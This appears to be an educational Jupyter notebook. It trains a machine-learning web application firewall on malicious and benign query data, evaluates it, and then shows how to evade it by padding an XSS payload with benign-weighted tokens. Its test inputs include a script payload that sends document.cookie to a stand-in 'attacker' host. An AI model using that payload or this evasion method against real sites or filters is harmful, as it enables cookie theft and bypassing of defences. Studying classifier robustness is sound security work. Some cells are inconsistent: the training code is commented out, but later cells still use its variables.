# Machine Learning WAF - Web Application Firewall
Sources:
* https://github.com/faizann24/Fwaf-Machine-Learning-driven-Web-Application-Firewall
* https://github.com/oreilly-mlsec/book-resources/tree/master/chapter8/waf

## Import libraries and load data

In [ ]:
import os, urllib.parse, pickle
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn import metrics

import matplotlib.pyplot as plt

In [ ]:
def loadFile(name):
    directory = str(os.getcwd())
    filepath = os.path.join(directory, name)
    with open(filepath, 'r', encoding='utf-8') as f:
        data = f.readlines()
    data = list(set(data))
    result = []
    for d in data:
        d = str(urllib.parse.unquote(d))   #converting url encoded data to simple string
        result.append(d)
    return result

In [ ]:
!wget https://github.com/fisher85/ml-cybersecurity/blob/master/python-waf/badqueries.zip?raw=true -O badqueries.zip
!unzip -u badqueries.zip

badQueries = loadFile('badqueries.txt')
badQueries[:10]

In [ ]:
!wget https://github.com/fisher85/ml-cybersecurity/blob/master/python-waf/goodqueries.zip?raw=true -O goodqueries.zip
!unzip -u goodqueries.zip

validQueries = loadFile('goodqueries.txt')
validQueries[:10]

In [ ]:
badQueries = list(set(badQueries))
validQueries = list(set(validQueries))
allQueries = badQueries + validQueries

In [ ]:
yBad = [1 for i in range(0, len(badQueries))]  #labels, 1 for malicious and 0 for clean
yGood = [0 for i in range(0, len(validQueries))]
y = yBad + yGood
queries = allQueries

In [ ]:
The operation may take a long time, 3-5 minutes depending on the computer performance. 

In [ ]:
# vectorizer = TfidfVectorizer(min_df = 0.0, analyzer="char", sublinear_tf=True, ngram_range=(1,3)) # converting data to vectors
# X = vectorizer.fit_transform(queries)

# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) # splitting data

# badCount = len(badQueries)
# validCount = len(validQueries)

# lgs = LogisticRegression(solver='lbfgs', class_weight={1: 2 * validCount / badCount, 0: 1.0}) # class_weight='balanced')
# lgs.fit(X_train, y_train) # training our model

## Pickle model

In [ ]:
!wget https://github.com/fisher85/ml-cybersecurity/blob/master/python-waf/trained_waf_model?raw=true -O trained_waf_model

p = Pipeline([
        ('vectorizer', vectorizer),
        ('classifier', lgs)
    ])

pickle.dump(p, open('trained_waf_model', 'wb'))

## Evaluation

In [ ]:
predicted = lgs.predict(X_test)

fpr, tpr, _ = metrics.roc_curve(y_test, (lgs.predict_proba(X_test)[:, 1]))
auc = metrics.auc(fpr, tpr)

print("Bad samples: %d" % badCount)
print("Good samples: %d" % validCount)
print("Baseline Constant negative: %.6f" % (validCount / (validCount + badCount)))
print("------------")
print("Accuracy: %f" % lgs.score(X_test, y_test))  #checking the accuracy
print("Precision: %f" % metrics.precision_score(y_test, predicted))
print("Recall: %f" % metrics.recall_score(y_test, predicted))
print("F1-Score: %f" % metrics.f1_score(y_test, predicted))
print("AUC: %f" % auc)

## Use pretrained model

In [ ]:
p = pickle.load(open('trained_waf_model', 'rb'))

In [ ]:
input_data = [
    '<script></script>',
    'hello.us',
    'www.google.com',
    "<script>window.location='http://attacker/?cookie='+document.cookie</script>"
]

pred = p.predict_proba(input_data).tolist()

for i in range(len(pred)):
    print("{:0.2f}%\tmalicious:\t{}".format(pred[i][1]*100, input_data[i]))

## Binary classifier evasion

In [ ]:
vars(p)

In [ ]:
vec = p.steps[0][1]
clf = p.steps[1][1]

In [ ]:
print(vec.idf_)

In [ ]:
print(clf.coef_)

In [ ]:
term_influence = vec.idf_ * clf.coef_
print(term_influence)

In [ ]:
print(np.argpartition(term_influence, 1))

In [ ]:
vec.vocabulary_

In [ ]:
# First, we create a token vocabulary dictionary so that
# we can access tokens by index.
vocab = dict([(v,k) for k,v in vec.vocabulary_.items()])

In [ ]:
term_idx = np.argpartition(term_influence, 1)[0][0]

In [ ]:
print(vocab[term_idx])

In [ ]:
payload = "<script>alert(1)</script>"

In [ ]:
p.predict([payload])[0]

In [ ]:
p.predict_proba([payload])[0]

In [ ]:
p.predict_proba([payload + '/' + vocab[term_idx]])[0]

In [ ]:
# Find the multiplier value at which the classifier will start making errors
multiplier = 100

In [ ]:
p.predict_proba([payload + '/' + vocab[term_idx]*multiplier])[0]

In [ ]:
p.predict([payload + '/' + vocab[term_idx]*multiplier])[0]

In [ ]:
print(payload + '/' + vocab[term_idx]*multiplier)